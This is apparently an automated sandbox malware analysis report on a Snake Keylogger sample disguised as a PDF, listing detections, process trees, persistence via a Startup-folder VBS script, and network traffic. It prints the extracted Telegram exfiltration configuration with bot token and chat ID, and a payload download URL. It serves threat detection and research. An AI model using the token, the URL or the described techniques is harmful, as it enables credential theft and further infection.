Windows Analysis Report
File07098.PDF.exe

Overview

General Information

Sample name: File07098.PDF.exe
Analysis ID: 1545174
MD5: 71360d65665d164b175a5a73964e96ec
SHA1: 4183950b0a17b9be22e05088ea666ebb45815a13
SHA256: f7679e885a80f2a9cfd8424891477ed8c77b4be6cf05bfc85d6d9dd87e095730
Tags: exe, user-abuse_ch
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • File07098.PDF.exe (PID: 4124 cmdline: "C:\Users\user\Desktop\File07098.PDF.exe" MD5: 71360D65665D164B175A5A73964E96EC)
    • InstallUtil.exe (PID: 2460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 3176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Current.exe (PID: 528 cmdline: "C:\Users\user\AppData\Roaming\Current.exe" MD5: 71360D65665D164B175A5A73964E96EC)
      • InstallUtil.exe (PID: 6204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo/sendMessage?chat_id=6008123474", "Token": "7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo", "Chat_id": "6008123474", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000006.00000002.4483465030.0000000002639000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x19c14:$x1: $%SMTPDV$
  • 0x19bbc:$x3: %FTPDV$
  • 0x19be0:$m2: Clipboard Logs ID
  • 0x19e1e:$m2: Screenshot Logs ID
  • 0x19f2e:$m2: keystroke Logs ID
  • 0x1a208:$m3: SnakePW
  • 0x19df6:$m4: \SnakeKeylogger\
00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
0.2.File07098.PDF.exe.5fc0000.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.File07098.PDF.exe.33f9170.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.File07098.PDF.exe.33f9170.2.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0.2.File07098.PDF.exe.33f9170.2.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x12c67:$a1: get_encryptedPassword
  • 0x12f53:$a2: get_encryptedUsername
  • 0x12a73:$a3: get_timePasswordChanged
  • 0x12b6e:$a4: get_passwordField
  • 0x12c7d:$a5: set_encryptedPassword
  • 0x142fe:$a7: get_logins
  • 0x14261:$a10: KeyLoggerEventArgs
  • 0x13ecc:$a11: KeyLoggerEventArgsEventHandler
0.2.File07098.PDF.exe.33f9170.2.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1a64a:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1987c:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19caf:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1acee:$a5: \Kometa\User Data\Default\Login Data

                System Summary

                Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\File07098.PDF.exe", CommandLine: "C:\Users\user\Desktop\File07098.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\File07098.PDF.exe, NewProcessName: C:\Users\user\Desktop\File07098.PDF.exe, OriginalFileName: C:\Users\user\Desktop\File07098.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\File07098.PDF.exe", ProcessId: 4124, ProcessName: File07098.PDF.exe
                Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , ProcessId: 3176, ProcessName: wscript.exe
                Source: Process started | Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs" , ProcessId: 3176, ProcessName: wscript.exe

                Data Obfuscation

                Source: File created | Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\File07098.PDF.exe, ProcessId: 4124, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-30T07:57:39.186966+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
                2024-10-30T07:57:43.541237+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | TCP
                2024-10-30T07:57:57.641366+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49765 | 188.114.96.3 | 443 | TCP
                2024-10-30T07:58:00.538612+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49785 | 188.114.96.3 | 443 | TCP
                2024-10-30T07:58:03.651769+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49804 | 188.114.96.3 | 443 | TCP

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-30T07:57:37.356642+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 193.122.130.0 | 80 | TCP
                2024-10-30T07:57:38.466060+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 193.122.130.0 | 80 | TCP
                2024-10-30T07:57:39.903580+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 193.122.130.0 | 80 | TCP
                2024-10-30T07:57:55.747290+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49750 | 193.122.130.0 | 80 | TCP
                2024-10-30T07:57:56.950406+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49750 | 193.122.130.0 | 80 | TCP
                2024-10-30T07:57:58.356676+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49767 | 193.122.130.0 | 80 | TCP

                AV Detection

                Source: File07098.PDF.exe | Avira: detected
                Source: C:\Users\user\AppData\Roaming\Current.exe | Avira: detection malicious, Label: HEUR/AGEN.1323701
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo/sendMessage?chat_id=6008123474", "Token": "7222429178:AAGkhVRfHIJkgzEwYivp9qfnKAhLB0iELTo", "Chat_id": "6008123474", "Version": "5.1"}
                Source: C:\Users\user\AppData\Roaming\Current.exe | ReversingLabs: Detection: 63%
                Source: File07098.PDF.exe | ReversingLabs: Detection: 63%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\Current.exe | Joe Sandbox ML: detected
                Source: File07098.PDF.exe | Joe Sandbox ML: detected

                Location Tracking

                Source: unknown | DNS query: name: reallyfreegeoip.org
                Source: File07098.PDF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: File07098.PDF.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

                Networking

                Source: Yara match | File source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: global traffic | HTTP traffic detected: GET /seuias/Mccudidikm.vdf HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org
                Source: Joe Sandbox View | IP Address: 188.132.193.46
                Source: Joe Sandbox View | IP Address: 188.114.96.3
                Source: Joe Sandbox View | IP Address: 193.122.130.0
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknown | DNS query: name: checkip.dyndns.org
                Source: unknown | DNS query: name: reallyfreegeoip.org
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.130.0:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.130.0:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49767 -> 193.122.130.0:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49750 -> 193.122.130.0:80
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49765 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49785 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49804 -> 188.114.96.3:443
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic HTTP traffic detected: GET /seuias/Mccudidikm.vdf HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic DNS traffic detected: DNS query: erkasera.com
                Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.com
                Source: InstallUtil.exe String found in binary or memory: http://checkip.dyndns.org
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                Source: File07098.PDF.exe, InstallUtil.exe, Current.exe String found in binary or memory: http://checkip.dyndns.org/q
                Source: InstallUtil.exe String found in binary or memory: http://reallyfreegeoip.org
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://erkasera.com
                Source: Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://erkasera.com/seuias/Mccudidikm.vdfC
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://erkasera.com/seuias/Mccudidikm.vdfCpHB?
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org
                Source: File07098.PDF.exe, InstallUtil.exe, Current.exe String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
                Source: InstallUtil.exe String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78$
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknown HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49724 version: TLS 1.2

                System Summary

                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
                Source: initial sample, Static PE information: Filename: File07098.PDF.exe
                Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: File07098.PDF.exe, 00000000.00000000.2018722011.00000000000A2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGilcdbotfkc.dll" vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs File07098.PDF.exe
